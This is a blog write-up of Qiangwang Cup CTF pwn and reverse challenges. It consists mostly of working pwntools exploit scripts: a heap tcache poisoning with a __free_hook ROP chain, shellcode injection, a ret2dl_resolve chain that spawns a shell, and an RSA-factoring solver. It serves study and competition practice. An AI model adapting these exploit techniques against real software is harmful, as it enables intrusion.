MENU

强网杯线上赛PWN、RE部分Writeup

June 15, 2021 • Read: 246 • Pwn,Reverse,CTF

比赛最后是 56 名,前面 ban 了很多,实际上 53 名就进了,可惜的是有一道题我没交上(因为一段时间的自闭,并且文件名搞错了,所以远程没有那么快的打通)

PWN

就是这道题,本地忘记替换 libseccomp.so.2 文件,导致远程和本地偏移不一致,远程一下子没打通。给自己几个大嘴巴子。

babypwn

from pwn import *
from z3 import *

elf = None
libc = None
file_name = "./babypwn"
#context.timeout = 1


def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary


def get_libc(dic=""):
    libc = ELF('/home/wjh/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address


def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)


def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()


def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    sh.sendlineafter(">>> ", str(idx))
    #sleep(0.5)


def add(size):
    choice(1)
    sh.sendlineafter("size:", str(size))


def edit(idx, content):
    choice(3)
    sh.sendlineafter("index:", str(idx))
    sh.sendlineafter("content:", str(content))

def decode(data):
    solver = Solver()
    a1 = BitVec('a1', 32)
    t = a1
    for i in range(2):
        a1 ^= (32 * a1) ^ (LShR((a1 ^ (32 * a1)), 17)) ^ (((32 * a1) ^ a1 ^ (LShR((a1 ^ (32 * a1)), 17))) << 13)
    solver.add(a1 == data)
    solver.check()
    ans = solver.model()
    return p32(solver.model()[t].as_long())


def show(idx):
    choice(4)
    sh.sendlineafter("index:\n", str(idx))
    t1 = sh.recvuntil('\n', drop=True)
    t2 = sh.recvuntil('\n', drop=True)
    a1 = decode(int(t1, 16))
    a2 = decode(int(t2, 16))
    return a1 + a2


def delete(idx):
    choice(2)
    sh.sendlineafter("index:", str(idx))

def pwn(sh, elf, libc):
    context.log_level = "debug"
    for i in range(10):
        add(0x108)
    for i in range(0x7):
        add(0xb8) #10-16
    for i in range(7):
        delete(3 + i) #3-9


    edit(1, 'a' * 0x30 + p64(0x40) + 'a' * 0xB8 + p64(0x100))
    delete(1)
    edit(0, 'a' * 0x108)
    edit(0, 'a' * 0x100 + p64(0x110))

    add(0xb8) #1
    add(0x38) #3
    add(0x38) #4

    libc_base = u64(show(1)) - 0x3ebd90
    log.success("libc_base:\t" + hex(libc_base))
    for i in range(7):
        delete(10 + i)
    delete(1)
    #gdb.attach(sh, "b _int_free")
    delete(2)
    add(0x98) #1
    add(0x58) #2
    edit(2, '\x00' * 0x18 + p64(0x201))
    delete(4)
    libc.address = libc_base
    free_hook_addr = libc.sym['__free_hook']
    edit(2, '\x00' * 0x18 + p64(0x201) + p64(free_hook_addr))
    add(0x1F8) #4
    add(0x1F8) #5

    pop_rdi_addr = libc.address + 0x000000000002155f
    pop_rsi_addr = libc.address + 0x0000000000023e6a
    pop_rdx_addr = libc.address + 0x0000000000001b96
    fake_frame_addr = libc.sym['__free_hook']
    frame = SigreturnFrame()

    frame.rax = 0
    frame.rdi = fake_frame_addr + 0xF8
    frame.rsp = fake_frame_addr + 0xF8 + 0x10 + 0x8
    frame.rip = pop_rdi_addr + 1  # : ret
    #log.success("libc.sym[open]:\t" + hex(libc.sym))
    rop_data = [
        libc.sym['open'],
        pop_rdx_addr,
        0x100,
        pop_rdi_addr,
        3,
        pop_rsi_addr,
        fake_frame_addr + 0x200,
        libc.sym['read'],
        pop_rdi_addr,
        fake_frame_addr + 0x200,
        libc.sym['puts']
    ]
    edit(5, p64(libc_base + 0x520a5) + str(frame)[8:0xF8] + "flag.txt" + p64(0) * 2 + flat(rop_data))
    #
    delete(5)

    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]orw

from pwn import *
elf = None
libc = None
file_name = "./pwn"
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag
def choice(idx):
    sh.sendlineafter("choice >>", str(idx))

def add(index, size, content):
    choice(1)
    sh.sendlineafter("index:", str(index))
    sh.sendlineafter("size:", str(size))
    sh.sendlineafter("content:", str(content))
def pwn(sh, elf, libc):
    context.log_level = "debug"
    orw_payload = '''
    /* open(file='./flag.txt', oflag=0, mode=0) */
    /* push './flag.txt\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f2e
    xor [rsp], rax
    mov rdi, rsp
    xor edx, edx /* 0 */
    xor esi, esi /* 0 */
    /* call open() */
    push SYS_open /* 2 */
    pop rax
    syscall
    xor eax, eax /* SYS_read */
    push 3
    pop rdi
    push 0x50
    pop rdx
    mov rsi, r13
    syscall
    /* write(fd=1, buf=0x123000, n=0x50) */
    push 1
    pop rdi
    /* call write() */
    push SYS_write /* 1 */
    pop rax
    syscall
    '''
    add(-13, 0, asm(orw_payload))
    #get_gdb(sh)
    choice(5)
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]no_output

from pwn import *
import roputils
elf = None
libc = None
file_name = "./test"
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def pwn(sh, elf, libc):
    context.log_level = "debug"
    #gdb.attach(sh, "b *0x8049236")
    sh.send('\x00' * 0x30)
    sleep(0.1)
    sh.send('a' * 0x20)
    sleep(0.1)
    sh.send('hello_boy\x00')
    sleep(0.1)
    sh.sendline("-2147483648")
    sh.sendline("-1")
    #sh.send('a' * 0x48 + 'b' * 4 + p32(0x8049236))
    sleep(0.1)
    rop = roputils.ROP_I386(file_name)
    addr_bss = rop.section('.bss')
    buf = rop.retfill(0x48 + 0x4)
    buf += rop.call('read', 0, addr_bss, 100)
    buf += rop.dl_resolve_call(addr_bss + 20, addr_bss)
    sh.send(buf)
    buf = rop.string('/bin/sh')
    buf += rop.fill(20, buf)
    buf += rop.dl_resolve_data(addr_bss + 20, 'system')
    buf += rop.fill(100, buf)
    sh.send(buf)
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]shellcode

from pwn import *
elf = None
libc = None
file_name = "./shellcode"
context.timeout = 1

def get_file(dic=""):
    #context.binary =
    return ELF(dic + file_name)

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag
flag = ""
def do(sh, k):
    global flag
    context.log_level = "error"
    #
    append_x86 = '''
    push ebx
    pop ebx
    '''
    shellcode_x86 = '''
    /*fp = open("flag.txt")*/
    mov esp,0x40404140
    push 0x67616c66
    push esp
    pop ebx
    xor ecx,ecx
    mov eax,5
    int 0x80
    '''
    shellcode_x86 = shellcraft.i386.linux.open('flag')
    shellcode_x86 = "mov esp,0x40404140\n" + shellcode_x86
    shellcode_x86 +='''mov ecx,eax
    push 0x33
    push 0x404040A0
    '''
    #print shellcode_x86
    shellcode_flag1 = '''
    retfq  
    /*read(fp,buf,0x70)*/
    mov rdi, rcx
    mov rsi,0x40404500
    mov rdx,0x70
    xor rax,rax
    syscall
    mov rbx, 0
  
    get:
    /*read(0,buf,0x70)*/
    mov rdi, 0
    mov rsi, 0x40404600
    xor rax,rax
    mov rdx, 2
    syscall
  
    mov bl, [rsi]
    mov rsi, 0x40404500
    mov al, [rsi + {0}]
    cmp al, bl
    jne get
    jmp cat
    cat:
    mov rax, 231
    syscall
    '''.format(k)
    shellcode_flag = shellcraft.read("ecx", "esp", 0x30)
    shellcode_flag += shellcraft.write(1, "esp", 0x30)
    shellcode_x86 = asm(shellcode_x86)
    shellcode_flag = asm(shellcode_flag1, arch='amd64', os='linux')
    shellcode = ''
    append = '''
    push rdx
    pop rdx
    '''
    shellcode_mmap = '''
    /*mmap(0x40404040,0x7e,7,34,0,0)*/
    push 0x40404040 /*set rdi*/
    pop rdi
    push 0x7e /*set rsi*/
    pop rsi
    push 0x40 /*set rdx*/
    pop rax
    xor al,0x47
    push rax
    pop rdx
    push 0x40 /*set r8*/
    pop rax
    xor al,0x40
    push rax
    pop r8
    push rax /*set r9*/
    pop r9
    /*syscall*/
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr[rax+0x31],cl
    push 0x5f
    pop rcx
    xor byte ptr[rax+0x32],cl
    push 0x22 /*set rcx*/
    pop rcx
    push 0x40/*set rax*/
    pop rax
    xor al,0x49
    '''
    shellcode_read = '''
    /*read(0,0x40404040,0x70)*/
    push 0x40404040
    pop rsi
    push 0x40
    pop rax
    xor al,0x40
    push rax
    pop rdi
    xor al,0x40
    push 0x70
    pop rdx
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr[rax+0x59],cl
    push 0x5f
    pop rcx
    xor byte ptr[rax+0x5A],cl
    push rdx
    pop rax
    push rsi
    pop rdx
    xor al,0x70
    '''
    shellcode_retfq = '''
    push rbx
    pop rax
    xor al,0x40
    push 0x72
    pop rcx
    xor byte ptr[rax+0x42],cl
    push 0x68
    pop rcx
    xor byte ptr[rax+0x42],cl
    push 0x47
    pop rcx
    sub byte ptr[rax+0x43],cl
    push 0x48
    pop rcx
    sub byte ptr[rax+0x43],cl
    push rdi
    push rdi
    push 0x23
    push 0x40404040
    pop rax
    push rax
    '''
    shellcode += shellcode_mmap
    shellcode += append
    shellcode += shellcode_read
    shellcode += append
    shellcode += shellcode_retfq
    shellcode += append
    shellcode = asm(shellcode, arch='amd64', os='linux')
    #print hex(len(shellcode))
    #print shellcode
    #gdb.attach(sh, "b *0x000000000040026D")
    context.log_level = "debug"
    sh.sendline(shellcode)

    #raw_input()
    # pause()
    sleep(1)
    #raw_input()
    sh.sendline(shellcode_x86.ljust(0x5E, '\x90') + shellcode_flag)
    #sh.interactive()
    last = "n"
    #context.log_level = "debug"
    ddd = "\x00" + string.digits + string.letters + "{}"
    for i in ddd:
        try:
            #raw_input()
            sh.sendline(i)
            sleep(0.1)
            last = i
            try:
                cur = sh.recv(timeout=0.05)
                cur = cur.replace(sh.newline, b'\n')
                if cur:
                    stdout = sys.stdout
                    if not term.term_mode:
                        stdout = getattr(stdout, 'buffer', stdout)
                    stdout.write(cur)
                    stdout.flush()
            except EOFError:
                log.success('Got EOF while reading in interactive')
            #print sh.closed
            if sh == None or sh.closed['recv']:
                raise EOFError

        except EOFError:
            flag += last
            print
            break
def pwn(sh, elf, libc):
    for k in range(0x30):
        print k, flag
        do(sh, k)
        sh = get_sh()
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

RE

StandOnTheGiants
看 native 函数发现是个 RSA,分解后 + 爆破 base64 内容,最后得到 flag

import gmpy2
from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.number import *
import base64
import string
def encode(x):
    n = 0x1321D2FDDDE8BD9DFF379AFF030DE205B846EB5CECC40FA8AA9C2A85CE3E992193E873B2BC667DABE2AC3EE9DD23B3A9ED9EC0C3C7445663F5455469B727DD6FBC03B1BF95D03A13C0368645767630C7EABF5E7AB5FA27B94ADE7E1E23BCC65D2A7DED1C5B364B51
    e = 0x10001
    t = pow(x, e, n)
    str1 = base64.b64encode(long_to_bytes(t)).decode()
    string1 = r"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-"
    string2 = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    print(str1)
    str1 = str1.translate(str.maketrans(string2, string1))
    return str1

test = bytes_to_long(('a' * 0x20).encode())
test = encode(test)
print(test)

#print(hex())
n_data = 0x1321D2FDDDE8BD9DFF379AFF030DE205B846EB5CECC40FA8AA9C2A85CE3E992193E873B2BC667DABE2AC3EE9DD23B3A9ED9EC0C3C7445663F5455469B727DD6FBC03B1BF95D03A13C0368645767630C7EABF5E7AB5FA27B94ADE7E1E23BCC65D2A7DED1C5B364B51
p = 33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
q = 64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
e = 0x010001
n = p * q
assert(n == n_data)

str1 = "bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="
#str1 = test
str1 = str1.replace('-', '\n')
str1 = str1.replace('+', '\t')
string1 = r"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-"
string2 = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
str1 = str1.translate(str.maketrans(string1,string2))
data = str1.split('\n')
data2 = []
def dfs2(x, get):
    if x == len(data2):
        c = base64.b64decode(get)
        c = bytes_to_long(c)
        # print(hex(c))
        phi = (p - 1) * (q - 1)
        d = gmpy2.invert(e, phi)
        m = pow(c, d, n)
        m = long_to_bytes(m)
        for i in m:
            if chr(i) not in string.printable:
                return
        print(m)
        return
    dfs2(x + 1, get + r"1" + data2[x])
    dfs2(x + 1, get + r"+" + data2[x])

def dfs(x, get):
    global data2
    if x == len(data):
        data2 = get.split('\t')
        dfs2(1, data2[0])
        return
    dfs(x + 1, get + r"3" + data[x])
    dfs(x + 1, get + r"/" + data[x])

print(data)
dfs(1, data[0])
#print(bytes_to_long(n_data))
Last Modified: June 25, 2021
Archives QR Code Tip
QR Code for this page
Tipping QR Code